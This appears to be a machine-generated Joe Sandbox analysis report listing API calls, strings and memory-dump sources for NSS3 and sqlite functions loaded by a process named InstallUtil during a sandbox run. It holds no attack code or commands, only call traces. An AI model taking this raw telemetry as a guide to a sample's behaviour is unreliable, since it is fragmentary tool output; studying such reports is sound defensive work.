                                                                                                                  Similarity
                                                                                                                  • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                  • String ID: %s=%c%s%c$%s=%s$oS{l"
                                                                                                                  • API String ID: 2709355791-2022856421
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEF6D
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • htonl.WSOCK32(00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEFE4
                                                                                                                  • htonl.WSOCK32(?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEFF1
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7FA4A1,?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DF00B
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DF027
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonlmemcpy$ErrorValue
                                                                                                                  • String ID: dtls13
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C75AFBE
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C879500,6C753F91), ref: 6C75AFD2
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C75B007
                                                                                                                    • Part of subcall function 6C7A6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C751666,?,6C75B00C,?), ref: 6C7A6AFB
                                                                                                                  • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C75B02F
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C75B046
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C75B058
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C75B060
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                  • String ID: security
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C79CD08
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C79CE16
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79D079
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Similarity
                                                                                                                  • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                  APIs
                                                                                                                  • PORT_ZAlloc_Util.NSS3(F0F7DD0C), ref: 6C752C5D
                                                                                                                    • Part of subcall function 6C7B0D30: calloc.MOZGLUE ref: 6C7B0D50
                                                                                                                    • Part of subcall function 6C7B0D30: TlsGetValue.KERNEL32 ref: 6C7B0D6D
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C752C8D
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C752CE0
                                                                                                                    • Part of subcall function 6C752E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C752CDA,?,00000000), ref: 6C752E1E
                                                                                                                    • Part of subcall function 6C752E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C752E33
                                                                                                                    • Part of subcall function 6C752E00: TlsGetValue.KERNEL32 ref: 6C752E4E
                                                                                                                    • Part of subcall function 6C752E00: EnterCriticalSection.KERNEL32(?), ref: 6C752E5E
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableLookup.NSS3(?), ref: 6C752E71
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableRemove.NSS3(?), ref: 6C752E84
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C752E96
                                                                                                                    • Part of subcall function 6C752E00: PR_Unlock.NSS3 ref: 6C752EA9
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C752D23
                                                                                                                  • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C752D30
                                                                                                                  • CERT_MakeCANickname.NSS3(00000001), ref: 6C752D3F
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C752D73
                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C752DB8
                                                                                                                  • free.MOZGLUE ref: 6C752DC8
                                                                                                                    • Part of subcall function 6C753E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C753EC2
                                                                                                                    • Part of subcall function 6C753E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C753ED6
                                                                                                                    • Part of subcall function 6C753E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C753EEE
                                                                                                                    • Part of subcall function 6C753E60: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C753F02
                                                                                                                    • Part of subcall function 6C753E60: PL_FreeArenaPool.NSS3 ref: 6C753F14
                                                                                                                    • Part of subcall function 6C753E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C753F27
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                  APIs
                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FAF
                                                                                                                  • PR_Now.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FD1
                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FFA
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779013
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779042
                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C77905A
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779073
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7790EC
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779111
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C6EE922
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6EE9CF
                                                                                                                  • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6EEA0F
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EEB20
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C6EEB57
                                                                                                                  Strings
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C6EEDC2
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 6C6EEE04
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 6C6EED18
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$memset
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C822FFD
                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C823007
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C823032
                                                                                                                  • sqlite3_mprintf.NSS3(6C88AAF9,?), ref: 6C823073
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8230B3
                                                                                                                  • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C8230C0
                                                                                                                  Strings
                                                                                                                  • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C8230BB
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                  • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E432
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E44F
                                                                                                                    • Part of subcall function 6C772C40: TlsGetValue.KERNEL32(#?wl,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C62
                                                                                                                    • Part of subcall function 6C772C40: EnterCriticalSection.KERNEL32(0000001C,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C76
                                                                                                                    • Part of subcall function 6C772C40: PL_HashTableLookup.NSS3(00000000,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C86
                                                                                                                    • Part of subcall function 6C772C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C93
                                                                                                                  • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E494
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E4AD
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E4D6
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E52F
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                  • String ID: #?wl
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,6C77124D,00000001), ref: 6C768D19
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C77124D,00000001), ref: 6C768D32
                                                                                                                  • PL_ArenaRelease.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768D73
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768D8C
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768DBA
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                  • String ID: KRAM$KRAM
                                                                                                                  APIs
                                                                                                                  • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C860EE6
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C860EFA
                                                                                                                    • Part of subcall function 6C74AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C74AF0E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F16
                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F1C
                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F25
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F2B
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                  • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824DC3
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C824DE0
                                                                                                                  Strings
                                                                                                                  • invalid, xrefs: 6C824DB8
                                                                                                                  • API call with %s database connection pointer, xrefs: 6C824DBD
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C824DCB
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C824DDA
                                                                                                                  • misuse, xrefs: 6C824DD5
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824E30
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C824E4D
                                                                                                                  Strings
                                                                                                                  • invalid, xrefs: 6C824E25
                                                                                                                  • API call with %s database connection pointer, xrefs: 6C824E2A
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C824E38
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C824E47
                                                                                                                  • misuse, xrefs: 6C824E42
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                  • API String ID: 632333372-2974027950
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(00000000,00000000,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?,?,00000000,?,?), ref: 6C790CB3
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?), ref: 6C790DC1
                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?), ref: 6C790DEC
                                                                                                                    • Part of subcall function 6C7B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C752AF5,?,?,?,?,?,6C750A1B,00000000), ref: 6C7B0F1A
                                                                                                                    • Part of subcall function 6C7B0F10: malloc.MOZGLUE(00000001), ref: 6C7B0F30
                                                                                                                    • Part of subcall function 6C7B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7B0F42
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790DFF
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C791444,?,00000001,?,00000000), ref: 6C790E16
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790E53
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?,?,6C791444,?,?,00000000), ref: 6C790E65
                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C791444,?,00000001,?,00000000,00000000,?), ref: 6C790E79
                                                                                                                    • Part of subcall function 6C7A1560: TlsGetValue.KERNEL32(00000000,?,6C770844,?), ref: 6C7A157A
                                                                                                                    • Part of subcall function 6C7A1560: EnterCriticalSection.KERNEL32(?,?,?,6C770844,?), ref: 6C7A158F
                                                                                                                    • Part of subcall function 6C7A1560: PR_Unlock.NSS3(?,?,?,?,6C770844,?), ref: 6C7A15B2
                                                                                                                    • Part of subcall function 6C76B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C771397,00000000,?,6C76CF93,5B5F5EC0,00000000,?,6C771397,?), ref: 6C76B1CB
                                                                                                                    • Part of subcall function 6C76B1A0: free.MOZGLUE(5B5F5EC0,?,6C76CF93,5B5F5EC0,00000000,?,6C771397,?), ref: 6C76B1D2
                                                                                                                    • Part of subcall function 6C7689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7688AE,-00000008), ref: 6C768A04
                                                                                                                    • Part of subcall function 6C7689E0: EnterCriticalSection.KERNEL32(?), ref: 6C768A15
                                                                                                                    • Part of subcall function 6C7689E0: memset.VCRUNTIME140(6C7688AE,00000000,00000132), ref: 6C768A27
                                                                                                                    • Part of subcall function 6C7689E0: PR_Unlock.NSS3(?), ref: 6C768A35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1601681851-0
                                                                                                                  APIs
                                                                                                                  • sqlite3_value_text.NSS3(?,?), ref: 6C746ED8
                                                                                                                  • sqlite3_value_text.NSS3(?,?), ref: 6C746EE5
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C746FA8
                                                                                                                  • sqlite3_value_text.NSS3(00000000,?), ref: 6C746FDB
                                                                                                                  • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C746FF0
                                                                                                                  • sqlite3_value_blob.NSS3(?,?), ref: 6C747010
                                                                                                                  • sqlite3_value_blob.NSS3(?,?), ref: 6C74701D
                                                                                                                  • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C747052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1920323672-0
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C7B7313), ref: 6C7B8FBB
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B9012
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B903C
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B909E
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B90DB
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B90F1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C7B7313), ref: 6C7B906B
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C7B7313), ref: 6C7B9128
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3590961175-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(6C7A2D7C,6C779192,?), ref: 6C7A248E
                                                                                                                  • EnterCriticalSection.KERNEL32(02B80138), ref: 6C7A24A2
                                                                                                                  • memset.VCRUNTIME140(6C7A2D7C,00000020,6C7A2D5C), ref: 6C7A250E
                                                                                                                  • memset.VCRUNTIME140(6C7A2D9C,00000020,6C7A2D7C), ref: 6C7A2535
                                                                                                                  • memset.VCRUNTIME140(?,00000020,?), ref: 6C7A255C
                                                                                                                  • memset.VCRUNTIME140(?,00000020,?), ref: 6C7A2583
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7A2594
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C7A25AF
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2972906980-0
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7A05DA
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • TlsGetValue.KERNEL32(00000000), ref: 6C7A060C
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C7A0629
                                                                                                                  • TlsGetValue.KERNEL32(00000000), ref: 6C7A066F
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C7A068C
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7A06AA
                                                                                                                  • PK11_GetNextSafe.NSS3 ref: 6C7A06C3
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7A06F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593870348-0
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7988FC
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C798913
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C87D864,?), ref: 6C798947
                                                                                                                    • Part of subcall function 6C7AE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7AE245
                                                                                                                    • Part of subcall function 6C7AE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7AE254
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C79895B
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C798973
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C798982
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7989EC
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C798A12
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2145430656-0
                                                                                                                  APIs
                                                                                                                  • PR_LogFlush.NSS3(00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86086C
